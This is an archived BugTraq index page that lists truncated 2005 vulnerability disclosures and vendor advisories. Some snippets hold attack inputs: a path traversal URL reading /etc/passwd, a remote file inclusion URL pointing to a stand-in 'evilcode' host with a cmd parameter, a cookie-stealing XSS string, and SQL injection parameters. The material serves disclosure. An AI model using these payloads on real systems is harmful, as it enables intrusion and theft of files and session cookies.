BugTraq
Hidden accounts on Sony Vaio laptops 2005-11-07
yash kadakia securityforge com
Sony Vaio laptops require you to create a user account the first time you start your laptop. If the user you select is not "Administrator", Sony still goes ahead and creates a user "Administrator" with a blank password.

This user does not show up in control panel under User Accounts but if you do

[ more ]  [ reply ]
SEC Consult SA-20051107-1 :: Macromedia Flash Player ActionDefineFunction Memory Corruption 2005-11-07
Bernhard Mueller (research sec-consult com)
SEC-CONSULT Security Advisory 20051107-1
=======================================================================================
title: Macromedia Flash Player ActionDefineFunction Memory Corruption
program: Macromedia Flash Plugin
vuln

[ more ]  [ reply ]
Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability 2005-11-07
Debasis Mohanty (debasis hackingspirits com)
Zone Labs Products Advance Program Control and OS Firewall (Behavioral
Based) Technology Bypass Vulnerability

I. PRODUCT BACKGROUND
ZoneAlarm Pro and Internet Security Suite with its a new level of protection
is what Zone Labs calls an "OS Firewall" based on "Behavior Based Analysis"
has gone beyo

[ more ]  [ reply ]
Path disclosure in CuteNews <= 1.4.0 2005-11-07
poizon securityinfo ru
A remote user can supply a specially crafted URL to
cause the system to display an error message that
discloses the installation path and other data.
Bug exists in "index.php".

Example:
http://victim.com/index.php?subaction=showfull&id=1128227686&archive=../../../../../../etc/passwd%00&start_from=

[ more ]  [ reply ]
OSTE v1.0 Remote Command Execution 2005-11-07
khc bsdmail org
This is a toplist script

Web Site : http://oste.nerdie.org [site closed]

Version : Only 1.0

anyway there is a piece :)

Code :

http://www.site.com/index.php?page=http://evilcode?&cmd=

or www.site.com/?site=evilcode?&cmd=

Google look for : OSTE v1.0 © 2003 Tyler Hall

Thanks all Kurdish Hack

[ more ]  [ reply ]
Work in Progress: FileZilla Server Terminal V0.9.4d Buffer Overflow 2005-11-07
inge henriksen booleansoft com
** Inge Henriksen Security Advisory inge.henriksen (at) booleansoft (dot) com **

I have discovered a buffer overflow in FileZilla Server Terminal 0.9.4d. The exploit is still to be considered as a work in progress as it is still not clear to me why the exploit works on some systems and not others. Please let

[ more ]  [ reply ]
[SECURITY] [DSA 809-3] New squid packages fix regression 2005-11-07
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 809-3 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
November 7th, 2005

[ more ]  [ reply ]
[SECURITY] [DSA 885-1] New OpenVPN packages fix several vulnerabilities 2005-11-07
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 885-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
November 7th, 2005

[ more ]  [ reply ]
[SECURITY] [DSA 886-1] New chmlib packages fix several vulnerabilities 2005-11-07
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 886-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
November 7th, 2005

[ more ]  [ reply ]
Re: Zoomblog HTML Injection Vulnerability 2005-11-07
RBA (rba eListas com)
> Zoomblog is prone to HTML injection attacks. It is possible for a
> malicious Zoomblog user to inject hostile HTML and script code into
> the commentary via form fields.

This bug was corrected on Nov.4th.

Also, the "Zoomblog <IMG> BBCode Tag JavaScript Injection Vulnerability"
was corrected

[ more ]  [ reply ]
[SECURITY] [DSA 888-1] New OpenSSL packages fix cryptographic weakness 2005-11-07
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 888-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
November 7th, 2005

[ more ]  [ reply ]
[ GLSA 200511-05 ] GNUMP3d: Directory traversal and XSS vulnerabilities 2005-11-06
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
[ GLSA 200511-04 ] ClamAV: Multiple vulnerabilities 2005-11-06
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
EUSecWest/London Call for Papers and PacSec/Tokyo announcements 2005-11-06
Dragos Ruiu (dr pacsec jp)

url: http://eusecwest.com
url: http://pacsec.jp

(PacSec/Tokyo Announcement below...)

EUSecWest/core06 CALL FOR PAPERS
--------------------------------

London Security Summit February 20/21 2006

LONDON, United Kingdom -- Applied technical security
will be the focus of a new annual conference fr

[ more ]  [ reply ]
Gallery_v2.4 SQL Injection 2005-11-04
abducter_minds yahoo com
#!/bin/env perl
#------------------------------------------------------------#
#- Warning :- (ABDUCTER) Behind U BY (ABDUCTER_MINDS (at) S4A (dot) CC) OR (ABDUCTER_MINDS (at) YAHOO (dot) COM)
#- [!] ==|| Gallery_v2.4 SQL Injection ||==
#- Gr33tz :-
#- N0N0

[ more ]  [ reply ]
Zoomblog HTML Injection Vulnerability 2005-11-04
sikikmail gmail com


DESCRIPTION
Zoomblog is prone to HTML injection attacks. It is possible for a malicious Zoomblog user to inject hostile HTML and script code into the commentary via form fields. This code may be rendered in the browser of a web user who views the commentary of Zoomblog.
Zoomblog does not adequatel

[ more ]  [ reply ]
Zoomblog HTML Injection Vulnerability 2005-11-04
sikikmail gmail com
DESCRIPTION
Zoomblog is prone to HTML injection attacks. It is possible for a malicious Zoomblog user to inject hostile HTML and script code into the commentary via form fields. This code may be rendered in the browser of a web user who views the commentary of Zoomblog.
Zoomblog does not adequately

[ more ]  [ reply ]
Re: OpenVPN[v2.0.x]: foreign_option() format string vulnerability. 2005-11-04
v9 (v9 fakehalo us)
ah, that would be what i did when testing("client"), sorry for the
false/confusion with that... anyways, great software i use it for my vpn
needs...nicely documented and easy to use--thanks for its existence.

> Vade79,
>
> Thanks for your efforts in finding this! I've just released OpenVPN 2.0.4
>

[ more ]  [ reply ]
[waraxe-2005-SA#043] - Sql injection in Phorum 5.0.20 and earlier 2005-11-04
come2waraxe yahoo com
{================================================================================}
{ [waraxe-2005-SA#043] }
{================================================================================}
{

[ more ]  [ reply ]
Vulnerabilities in Invision Power Board 2.1 [xss] 2005-11-04
benjilenoob hotmail com
Author: benjilenoob
WebSite : http://benji.redkod.org/ and http://www.redkod.org/
Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf

Product: Invision Power Board
Version: 2.1
Vulnerability types: persistent and non-persistent XSS.
Risk: Low.

I- Non-critical XSS vulnerabilities:
-----------

[ more ]  [ reply ]
Xss - Html injection in XMB 2005-11-04
s2b hotmail com
Hello

This is Xss in the old versions and html injection in the new versions of xmb forums ..

Discovered By : HACKERS PAL

injected file
u2u.php

as the below
u2u.php?action=send&username=|Html Injection OR XSS

Thanks ,,

[ more ]  [ reply ]
Invision Power Board Privilege Escalation (2.0.1 + more) 2005-11-04
Anti Matter (antimatter gmail com)
---------
Title: Invision Power Board
---------
Version: 2.0.1 (maybe more)
---------
Severity: Low
---------
Info: Invision Board Admin able to execute arbitrary code as uid of
the apache process.
----------
Bug(s):

#1 Fails to jail location of Task Managers scripts and allows
directory traversal.

[ more ]  [ reply ]
I-Saudi.Com First K-S-A WarGamE 2005-11-05
S3ude Hotmail com
This War Game is the first Saudi War Game.

We tried to make the War Game levels as easy as possible to make sure that experts and even newbies can join us and have a good time.

The WarGame requires the basics of programming, security bugs and needs some thinking. Many of those people who

[ more ]  [ reply ]
XSS & SQL injection in phpWebThings 2005-11-05
xx_hack_xx_2004 hotmail com
Vulnerable: phpWebThings 1.4.4
http://phpwebthings.org

The bug resides in : forum.php

Exploit :

http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]

Example :

XSS

http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>

SQL

For Password

http://xxx.com/fo

[ more ]  [ reply ]
Zoomblog <IMG> BBCode Tag JavaScript Injection Vulnerability 2005-11-05
sikikmail gmail com
DETAILS
Zoomblog is prone to javascript injection attacks.
Zoomblog does not adequately filter <img> tags from various fields.
It is possible for a malicious Zoomblog user to inject hostile javascript code into the commentary via form fields. This code may be rendered in the browser of a web user

[ more ]  [ reply ]
Sql injection in ibProArcade 2005-11-05
bhfh01 gmail com

Sql injection in ibProArcade.
#############################

This bug was discovered in all of the versions of ibproarcade 2.x.
It was tested and found perfectly working under vBulletin or Invision Power Board.
Date:2005-11-5

The injection is here:
module=report&user=[userid]
Query: 'SELECT name FR

[ more ]  [ reply ]
iDEFENSE Security Advisory 11.04.05: Clam AntiVirus tnef_attachment() DoS Vulnerability 2005-11-04
iDEFENSE Labs (labs-no-reply idefense com)
Clam AntiVirus tnef_attachment() DoS Vulnerability

iDEFENSE Security Advisory 11.04.05
http://www.idefense.com/application/poi/display?type=vulnerabilities
November 4, 2005

I. BACKGROUND

Clam AntiVirus is a GPL anti-virus toolkit for Unix.

II. DESCRIPTION

Remote exploitation of a design error i

[ more ]  [ reply ]
iDEFENSE Security Advisory 11.04.05: Clam AntiVirus Cabinet-file handling Denial of Service Vulnerability 2005-11-04
iDEFENSE Labs (labs-no-reply idefense com)
Clam AntiVirus Cabinet-file handling Denial of Service Vulnerability

iDEFENSE Security Advisory 11.04.05
http://www.idefense.com/application/poi/display?type=vulnerabilities
November 4, 2005

I. BACKGROUND

Clam AntiVirus is a GPL anti-virus toolkit for Unix.

II. DESCRIPTION

Remote exploitation o

[ more ]  [ reply ]
Copyright 2010, SecurityFocus